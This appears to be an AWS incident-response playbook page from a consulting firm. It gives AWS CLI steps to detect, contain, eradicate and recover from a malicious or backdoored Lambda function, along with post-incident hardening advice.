Free AWS Security Whitepaper
    Toc Consulting Logo
    HIGHMalware20-30 min containment15 steps across 5 phases

    Lambda Function Abuse

    A Lambda function is executing malicious code - either a function was modified to include a backdoor, a new malicious function was deployed, or an existing function is being invoked with crafted payloads to exploit vulnerabilities. Lambda abuse can lead to credential theft via the execution role, data exfiltration, or crypto mining.

    lambdalambdacloudtrailcloudtrailcloudwatchcloudwatchiamiam

    Phase 1: Detection

    $ tail -f /var/log/cloudtrail/events.log
    1

    Check CloudTrail for suspicious Lambda operations

    Look for unauthorized function creation, code updates, or configuration changes.

    aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=UpdateFunctionCode \
  --start-time <incident-start>
    aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=CreateFunction \
  --start-time <incident-start>
    CloudTrail:CreateFunctionUpdateFunctionCodeUpdateFunctionConfigurationAddPermissionCreateEventSourceMapping
    2

    Review CloudWatch Logs for the function

    Check Lambda execution logs for unexpected behavior: outbound network calls, credential access, unusual error patterns.

    aws logs filter-log-events \
  --log-group-name "/aws/lambda/<function-name>" \
  --start-time <epoch-ms> \
  --filter-pattern "ERROR"
    3

    Check for unusual invocation patterns

    Review Lambda metrics for unexpected spikes in invocation count, duration, or concurrent executions.

    aws cloudwatch get-metric-statistics \
  --namespace AWS/Lambda \
  --metric-name Invocations \
  --dimensions Name=FunctionName,Value=<function-name> \
  --start-time <24h-ago> --end-time <now> \
  --period 3600 --statistics Sum

    Phase 2: Containment

    $ ./containment.sh --isolate --immediate
    1

    Disable the function by setting concurrency to zero

    Setting reserved concurrency to 0 prevents any new invocations without deleting the function.

    aws lambda put-function-concurrency \
  --function-name <function-name> \
  --reserved-concurrent-executions 0

    This is the safest way to stop a Lambda function. Setting concurrency to 0 prevents new invocations while preserving the code for forensic analysis.

    2

    Remove event source triggers

    Disable any event source mappings (SQS, DynamoDB Streams, Kinesis) that could trigger the function.

    aws lambda list-event-source-mappings \
  --function-name <function-name>
    aws lambda update-event-source-mapping \
  --uuid <mapping-uuid> \
  --enabled false
    3

    Restrict the execution role

    Attach a deny-all policy to the Lambda execution role to prevent any further API calls.

    aws iam put-role-policy \
  --role-name <lambda-execution-role> \
  --policy-name DenyAll-IncidentResponse \
  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Deny","Action":"*","Resource":"*"}]}'

    Phase 3: Eradication

    $ ./eradicate.sh --purge --verify
    1

    Download and analyze the function code

    Download the deployment package to analyze for malicious modifications.

    aws lambda get-function --function-name <function-name> \
  --query 'Code.Location' --output text | xargs curl -o function-code.zip
    2

    Check for environment variable tampering

    Attackers may inject malicious values into environment variables (e.g., overriding library paths).

    aws lambda get-function-configuration \
  --function-name <function-name> \
  --query 'Environment.Variables'
    3

    Delete unauthorized functions

    Remove any Lambda functions that were created by the attacker.

    aws lambda delete-function --function-name <malicious-function>

    Phase 4: Recovery

    $ ./recovery.sh --restore --validate
    1

    Redeploy the function from a trusted source

    Deploy the function code from your version control system (Git), not from the AWS copy which may be tampered.

    2

    Rotate the execution role credentials

    Remove and re-create the execution role, or revoke old sessions with a time-based condition.

    3

    Re-enable the function with monitoring

    Set concurrency back to normal and enable enhanced monitoring for the next 48 hours.

    aws lambda delete-function-concurrency --function-name <function-name>

    Phase 5: Lessons Learned

    $ cat POST_INCIDENT_REVIEW.md
    1

    Implement code signing for Lambda

    Use AWS Signer to ensure only code signed by your organization can be deployed to Lambda.

    2

    Apply least-privilege to execution roles

    Each Lambda function should have its own execution role with only the permissions it needs. Never reuse roles across functions.

    3

    Enable Lambda function URL auth and resource policies

    If using function URLs, require IAM authentication. Review resource policies to prevent unauthorized invocations.

    lambdaserverlesscode-injectionexecution-roleexfiltration
    Previous
    Unauthorized Root Account Access
    Next
    RDS Database Exposure

    Need Help with Incident Response?

    When an incident strikes, every minute counts. We help AWS teams prepare, detect, and respond to security incidents with proven expertise.

    All PlaybooksGet in Touch